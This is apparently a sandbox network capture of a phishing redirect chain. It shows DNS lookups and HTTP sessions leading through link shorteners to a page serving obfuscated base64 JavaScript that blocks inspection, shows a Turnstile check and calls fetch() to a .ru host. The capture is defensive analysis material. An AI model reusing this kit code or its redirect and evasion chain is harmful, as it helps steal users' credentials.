                                                                              Dec 11, 2024 15:19:40.871653080 CET1.1.1.1192.168.2.160xd263No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:40.871653080 CET1.1.1.1192.168.2.160xd263No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:40.871653080 CET1.1.1.1192.168.2.160xd263No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:42.391680956 CET1.1.1.1192.168.2.160xa449No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:42.391680956 CET1.1.1.1192.168.2.160xa449No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:42.392759085 CET1.1.1.1192.168.2.160xd314No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:42.407094002 CET1.1.1.1192.168.2.160x382cNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:42.407661915 CET1.1.1.1192.168.2.160xe3e1No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:42.407661915 CET1.1.1.1192.168.2.160xe3e1No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:49.657437086 CET1.1.1.1192.168.2.160xf694No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:01.721769094 CET1.1.1.1192.168.2.160xfa13No error (0)ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru65IN (0x0001)false
                                                                              Dec 11, 2024 15:20:01.723469973 CET1.1.1.1192.168.2.160x47f5No error (0)ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru104.21.32.251A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:01.723469973 CET1.1.1.1192.168.2.160x47f5No error (0)ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru172.67.139.11A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:05.242324114 CET1.1.1.1192.168.2.160x34acNo error (0)ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru172.67.139.11A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:05.242324114 CET1.1.1.1192.168.2.160x34acNo error (0)ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru104.21.32.251A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:05.246661901 CET1.1.1.1192.168.2.160x79aaNo error (0)ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru65IN (0x0001)false
                                                                              Dec 11, 2024 15:20:05.926214933 CET1.1.1.1192.168.2.160x1808No error (0)www.onedrive.comodwebp.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:05.926214933 CET1.1.1.1192.168.2.160x1808No error (0)odsp-odweb-webfe-lb.eurwesteur001307.odsp-odweb-webfe.westeurope-prod.cosmic.office.netcosmic-westeurope-ns-cbf6e4cb41a8.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:05.927355051 CET1.1.1.1192.168.2.160x7280No error (0)www.onedrive.comodwebp.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:05.927355051 CET1.1.1.1192.168.2.160x7280No error (0)odsp-odweb-webfe-lb.eurwesteur001307.odsp-odweb-webfe.westeurope-prod.cosmic.office.netcosmic-westeurope-ns-cbf6e4cb41a8.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:08.236669064 CET1.1.1.1192.168.2.160xfe27No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:08.236669064 CET1.1.1.1192.168.2.160xfe27No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:08.236669064 CET1.1.1.1192.168.2.160xfe27No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:08.236669064 CET1.1.1.1192.168.2.160xfe27No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:08.236669064 CET1.1.1.1192.168.2.160xfe27No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:08.718405008 CET1.1.1.1192.168.2.160x6fa8No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:08.718405008 CET1.1.1.1192.168.2.160x6fa8No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:14.862924099 CET1.1.1.1192.168.2.160x6f16No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:14.872026920 CET1.1.1.1192.168.2.160xf421No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:15.130551100 CET1.1.1.1192.168.2.160xf7efNo error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:15.149466038 CET1.1.1.1192.168.2.160x913cNo error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:17.837740898 CET1.1.1.1192.168.2.160xb65No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:17.838284969 CET1.1.1.1192.168.2.160x762No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:18.988022089 CET1.1.1.1192.168.2.160x93c4No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:19.085902929 CET1.1.1.1192.168.2.160x9323No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:21.162115097 CET1.1.1.1192.168.2.160x554fNo error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:21.162786961 CET1.1.1.1192.168.2.160x2c30No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              • app.signitic.com
                                                                              • zurl.co
                                                                              • fht.lidociou.com
                                                                              • https:
                                                                                • cdnjs.cloudflare.com
                                                                                • challenges.cloudflare.com
                                                                                • code.jquery.com
                                                                                • ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru
                                                                                • onedrive.live.com
                                                                              • a.nel.cloudflare.com
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.164970315.236.57.514436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:31 UTC726OUTGET /l/aWRMVnlrQ0g4NXZzVTh6eGpEV2N6UT09-MG1ORVZRQWgwZXZXZVQwS3pYcjdDdz09 HTTP/1.1
                                                                              Host: app.signitic.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-User: ?1
                                                                              Sec-Fetch-Dest: document
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:32 UTC349INHTTP/1.1 302 Found
                                                                              Date: Wed, 11 Dec 2024 14:19:31 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Server: Apache
                                                                              Cache-Control: max-age=0, must-revalidate, private
                                                                              Referrer-Policy: no-referrer, strict-origin-when-cross-origin
                                                                              Expires: Wed, 11 Dec 2024 14:19:31 GMT
                                                                              Location: https://zurl.co/uPUU
                                                                              2024-12-11 14:19:32 UTC333INData Raw: 31 34 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 7a 75 72 6c 2e 63 6f 2f 75 50 55 55 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 7a 75 72 6c 2e 63 6f 2f 75 50 55 55 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20
                                                                              Data Ascii: 146<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://zurl.co/uPUU'" /> <title>Redirecting to https://zurl.co/uPUU</title> </head> <body> Redirecting to
                                                                              2024-12-11 14:19:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.1649706136.143.187.524436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:34 UTC654OUTGET /uPUU HTTP/1.1
                                                                              Host: zurl.co
                                                                              Connection: keep-alive
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-User: ?1
                                                                              Sec-Fetch-Dest: document
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:34 UTC836INHTTP/1.1 302
                                                                              Server: ZGS
                                                                              Date: Wed, 11 Dec 2024 14:19:34 GMT
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: zalb_3b88102d5d=70ae8459153fad3da1e4274dcc9a2064; Path=/; Secure; HttpOnly
                                                                              X-Content-Type-Options: nosniff
                                                                              Set-Cookie: z_frscus=42e1d4fc-e81b-432e-a853-fa2f0ce458ce;path=/;SameSite=None;Secure;priority=high
                                                                              Set-Cookie: _zcsr_tmp=42e1d4fc-e81b-432e-a853-fa2f0ce458ce;path=/;SameSite=Strict;Secure;priority=high
                                                                              Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                              Pragma: no-cache
                                                                              Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Set-Cookie: zsmurl=QYYVau29l8bpPw4Y0VgSndlIsMKdHlTysjUDzYZB83PDGRLMnc; Max-Age=15552000; Expires=Mon, 09 Jun 2025 14:19:34 GMT; Domain=zurl.co; Secure; HttpOnly
                                                                              Location: https://fhT.lidociou.com/lrjqM/
                                                                              Strict-Transport-Security: max-age=63072000


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.1649712104.21.86.904436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:37 UTC665OUTGET /lrjqM/ HTTP/1.1
                                                                              Host: fht.lidociou.com
                                                                              Connection: keep-alive
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-User: ?1
                                                                              Sec-Fetch-Dest: document
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:38 UTC1219INHTTP/1.1 200 OK
                                                                              Date: Wed, 11 Dec 2024 14:19:37 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Cache-Control: no-cache, private
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ayRy7h0PBeARW8rlUhjhNgnCWN2qiUinPy%2B1RibNcgWVlkJiKoLI7Kya2%2BPHp7aQOtgSmBOQAbP6S%2Fda3FRKRctCgPZFXRJqlWhwz68z3q99WLaa5Fvi2VTir3yK5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6719&min_rtt=6402&rtt_var=2627&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1568&delivery_rate=452358&cwnd=251&unsent_bytes=0&cid=5a37c0701c79e829&ts=109&x=0"
                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IkE4VDhjdXFoejc5SUkvWHRYUEIyNmc9PSIsInZhbHVlIjoic0tXZjAvSGg1THFpdktBOXJadCtVUnJiR2MzYVJ1UjdvYUVmMXpEalpYSTJrYzh0czlKczhpaGpUU3o1RzArajRpclBpWi90SUsrL1RobmkvR2tlaXJZRkpLRUdYSG11ZDdic2JyNlNiVkIzMHU4Z0dCUDJqM0JDY3Awa0Q2Tk4iLCJtYWMiOiIwZTlkZGY2YTIxZDQ4ZDM1MmRjZjA2ZTA1NjYxNzRiMzI3OTA5YjA2ZjAxOWQyYjNiNDIyOTgwMDRmM2I1MGNjIiwidGFnIjoiIn0%3D; expires=Wed, 11-Dec-2024 16:19:37 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                              2024-12-11 14:19:38 UTC731INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 56 79 52 6d 74 4d 57 48 4e 31 4d 58 64 4a 52 32 4e 54 56 30 30 31 53 44 64 59 5a 47 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4d 44 52 69 5a 58 55 34 4d 32 38 79 63 46 46 4a 4f 47 39 7a 56 7a 56 50 61 44 5a 48 61 55 46 79 5a 55 64 56 4e 48 56 5a 4d 33 52 4e 64 6d 31 42 4c 33 52 42 61 44 68 75 4e 6e 68 57 4b 7a 52 4d 56 46 56 59 63 57 64 42 62 46 6b 79 55 56 49 72 4d 47 74 68 55 55 31 50 5a 30 78 56 4d 45 56 35 53 6b 6c 48 62 55 4e 78 65 44 4e 61 59 31 68 34 52 6d 4a 4f 5a 48 64 4c 53 57 35 46 54 57 5a 74 51 31 5a 76 5a 58 70 30 65 46 6b 79 5a 6c 41 7a 55 30 78 6b 4b 32 6c 44 62 7a 52 6c 65 56 5a 73 53 46 52 7a 63 6c 63 78 54 54 51
                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InVyRmtMWHN1MXdJR2NTV001SDdYZGc9PSIsInZhbHVlIjoiMDRiZXU4M28ycFFJOG9zVzVPaDZHaUFyZUdVNHVZM3RNdm1BL3RBaDhuNnhWKzRMVFVYcWdBbFkyUVIrMGthUU1PZ0xVMEV5SklHbUNxeDNaY1h4RmJOZHdLSW5FTWZtQ1ZvZXp0eFkyZlAzU0xkK2lDbzRleVZsSFRzclcxTTQ
                                                                              2024-12-11 14:19:38 UTC788INData Raw: 34 63 66 61 0d 0a 3c 21 2d 2d 20 54 68 65 20 62 69 67 67 65 73 74 20 72 69 73 6b 20 69 73 20 6e 6f 74 20 74 61 6b 69 6e 67 20 61 6e 79 20 72 69 73 6b 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 6d 61 46 51 75 62 47 6c 6b 62 32 4e 70 62 33 55 75 59 32 39 74 4c 32 78 79 61 6e 46 4e 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63
                                                                              Data Ascii: 4cfa... The biggest risk is not taking any risk. --><script>if(atob("aHR0cHM6Ly9maFQubGlkb2Npb3UuY29tL2xyanFNLw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c
                                                                              2024-12-11 14:19:38 UTC1369INData Raw: 35 68 62 57 55 39 49 6e 5a 70 5a 58 64 77 62 33 4a 30 49 69 42 6a 62 32 35 30 5a 57 35 30 50 53 4a 33 61 57 52 30 61 44 31 6b 5a 58 5a 70 59 32 55 74 64 32 6c 6b 64 47 67 73 49 47 6c 75 61 58 52 70 59 57 77 74 63 32 4e 68 62 47 55 39 4d 53 34 77 49 6a 34 4e 43 69 41 67 49 43 41 38 64 47 6c 30 62 47 55 2b 4a 69 4d 34 4d 6a 41 7a 4f 7a 77 76 64 47 6c 30 62 47 55 2b 44 51 6f 67 49 43 41 67 50 48 4e 30 65 57 78 6c 50 67 30 4b 59 6d 39 6b 65 53 42 37 44 51 6f 67 49 47 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 59 32 39 73 62 33 49 36 49 43 4e 6d 5a 6d 59 37 44 51 6f 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 62 33 5a 6c 63 6d 5a 73 62 33 63 36 49 47 68 70 5a 47 52 6c 62 6a 73 4e 43 6e 30 4e 43 69 4e 52 64 55 56 6b 51 6d 74 6e 64
                                                                              Data Ascii: 5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNRdUVkQmtnd
                                                                              2024-12-11 14:19:38 UTC1369INData Raw: 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 31 46 31 52 57 52 43 61 32 64 33 52 6d 4d 67 4c 6d 31 30 4c 54 51 67 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44 46 79 5a 57 30 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 4e 52 64 55 56 6b 51 6d 74 6e 64 30 5a 6a 49 43 4e 5a 57 58 5a 46 52 46 56 48 61 6e 70 6c 49 48 74 6a 62 32 78 76 63 6a 6f 67 49 7a 5a 6a 4e 7a 55 33 5a 44 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 4d 54 52 77 65 44 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 69 41 75 4e 58 4a 6c 62 54 74 39 44 51 6f 67 49 43 41 67 50 43 39 7a 64 48 6c 73 5a 54 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 50 67 30 4b 49 43 41 67 49 47 6c 6d 49 43 68 75 59 58 5a 70 5a 32 46 30 62 33 49 75 64 32 56 69 5a 48 4a 70 64 6d
                                                                              Data Ascii: pbXBvcnRhbnQ7fQ0KI1F1RWRCa2d3RmMgLm10LTQge21hcmdpbi10b3A6IDFyZW0haW1wb3J0YW50O30NCiNRdUVkQmtnd0ZjICNZWXZFRFVHanplIHtjb2xvcjogIzZjNzU3ZDtmb250LXNpemU6MTRweDttYXJnaW4tdG9wOiAuNXJlbTt9DQogICAgPC9zdHlsZT4NCiAgICA8c2NyaXB0Pg0KICAgIGlmIChuYXZpZ2F0b3Iud2ViZHJpdm
                                                                              2024-12-11 14:19:38 UTC1369INData Raw: 59 55 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 4e 43 69 41 67 49 43 41 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 5a 58 5a 6c 62 6e 51 75 63 48 4a 6c 64 6d 56 75 64 45 52 6c 5a 6d 46 31 62 48 51 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 47 5a 68 62 48 4e 6c 4f 77 30 4b 49 43 41 67 49 48 30 4e 43 6e 30 70 4f 77 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 59 32 39 75 64 47 56 34 64 47 31 6c 62 6e 55 6e 4c 43 42 6d 64 57 35 6a 64 47 6c 76 62 69 68 6c 64 6d 56 75 64 43 6b 67 65 77 30 4b 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78
                                                                              Data Ascii: YUtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkNCiAgICApIHsNCiAgICAgICAgZXZlbnQucHJldmVudERlZmF1bHQoKTsNCiAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgIH0NCn0pOw0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcignY29udGV4dG1lbnUnLCBmdW5jdGlvbihldmVudCkgew0KICAgIGV2ZW50LnByZXZlbnREZWZhdWx
                                                                              2024-12-11 14:19:38 UTC1369INData Raw: 32 78 68 63 33 4d 39 49 6d 4e 6d 58 33 52 31 63 6d 35 7a 64 47 6c 73 5a 53 49 67 61 57 51 39 49 6d 4e 6d 49 6a 34 38 4c 32 52 70 64 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 7a 61 57 51 69 49 47 35 68 62 57 55 39 49 6e 4e 70 5a 43 49 67 64 6d 46 73 64 57 55 39 49 6e 4a 68 64 45 52 5a 4e 6a 4e 4d 54 33 5a 59 59 32 52 6c 51 30 68 6b 4d 44 4e 79 65 44 46 7a 59 31 4e 43 4f 45 52 79 59 32 73 7a 52 56 4e 69 4f 44 56 43 4f 54 49 69 50 67 30 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6e 42 68 5a 32 56 73 61 57 35 72 49 69 42 75 59 57 31 6c 50 53 4a 77 59 57 64 6c 62 47 6c 75 61 79 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38
                                                                              Data Ascii: 2xhc3M9ImNmX3R1cm5zdGlsZSIgaWQ9ImNmIj48L2Rpdj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJzaWQiIG5hbWU9InNpZCIgdmFsdWU9InJhdERZNjNMT3ZYY2RlQ0hkMDNyeDFzY1NCOERyY2szRVNiODVCOTIiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9InBhZ2VsaW5rIiBuYW1lPSJwYWdlbGluayIgdmFsdWU9IiI+DQo8
                                                                              2024-12-11 14:19:38 UTC1369INData Raw: 45 78 4a 7a 73 4e 43 69 41 67 49 43 42 32 59 58 49 67 55 31 64 68 52 6d 31 36 62 46 5a 46 61 69 41 39 49 43 49 75 4c 69 39 73 62 6d 6c 31 65 6d 56 5a 65 55 64 6f 64 6e 46 77 56 6d 6c 46 54 48 5a 36 4e 30 78 35 53 6d 31 36 54 32 56 75 53 54 51 30 59 57 63 69 4f 77 30 4b 49 43 41 67 49 47 5a 6c 64 47 4e 6f 4b 43 64 6f 64 48 52 77 63 7a 6f 76 4c 32 6c 6a 4d 33 52 4e 4f 47 5a 32 54 57 39 4b 55 6e 68 4e 4d 32 4e 72 63 54 4e 51 62 6d 6c 45 4e 45 6c 6d 55 30 35 4f 4d 58 4e 47 64 7a 64 77 4d 6c 56 4e 63 45 4a 50 4d 48 64 72 5a 6c 68 30 53 47 64 4d 62 45 73 33 5a 53 35 6c 65 6d 31 69 63 32 64 36 62 53 35 79 64 53 39 48 57 55 4a 79 54 46 46 57 5a 32 70 47 54 6e 42 42 51 57 56 44 54 6d 78 34 5a 31 70 46 56 57 52 6e 5a 56 4a 43 53 45 68 53 55 31 70 50 56 55 4e 46 55
                                                                              Data Ascii: ExJzsNCiAgICB2YXIgU1dhRm16bFZFaiA9ICIuLi9sbml1emVZeUdodnFwVmlFTHZ6N0x5Sm16T2VuSTQ0YWciOw0KICAgIGZldGNoKCdodHRwczovL2ljM3RNOGZ2TW9KUnhNM2NrcTNQbmlENElmU05OMXNGdzdwMlVNcEJPMHdrZlh0SGdMbEs3ZS5lem1ic2d6bS5ydS9HWUJyTFFWZ2pGTnBBQWVDTmx4Z1pFVWRnZVJCSEhSU1pPVUNFU
                                                                              2024-12-11 14:19:38 UTC1369INData Raw: 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 0d 0a 61 52 4b 74 64 74 4c 4e 41 78 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 61 52 4b 74 64 74 4c 4e 41 78 29 3b 0d 0a 0d 0a 7d 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 75 73 75 61 6c 6c 79 20 63 6f 6d 65 73 20 74 6f 20 74 68 6f 73 65 20 77 68 6f 20 61 72 65 20 74 6f 6f 20 62 75 73 79 20 74 6f 20 62 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 74 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 6d 61 46 51 75 62 47 6c 6b 62 32 4e 70 62 33 55 75 59 32 39 74 4c 32 78 79 61 6e 46 4e 4c 77 3d 3d 22 29 20 21 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 63 6f 6e 73 74 20 75 55 62 44 62 41 68 61 74 45 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f
